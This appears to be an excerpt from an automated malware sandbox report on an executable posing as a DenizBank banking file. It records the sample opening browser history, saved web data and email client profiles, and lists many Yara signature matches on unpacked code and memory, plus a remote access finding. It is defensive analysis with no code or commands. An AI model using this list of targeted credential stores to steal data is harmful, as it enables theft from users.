Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1801804713.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match

File source: 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR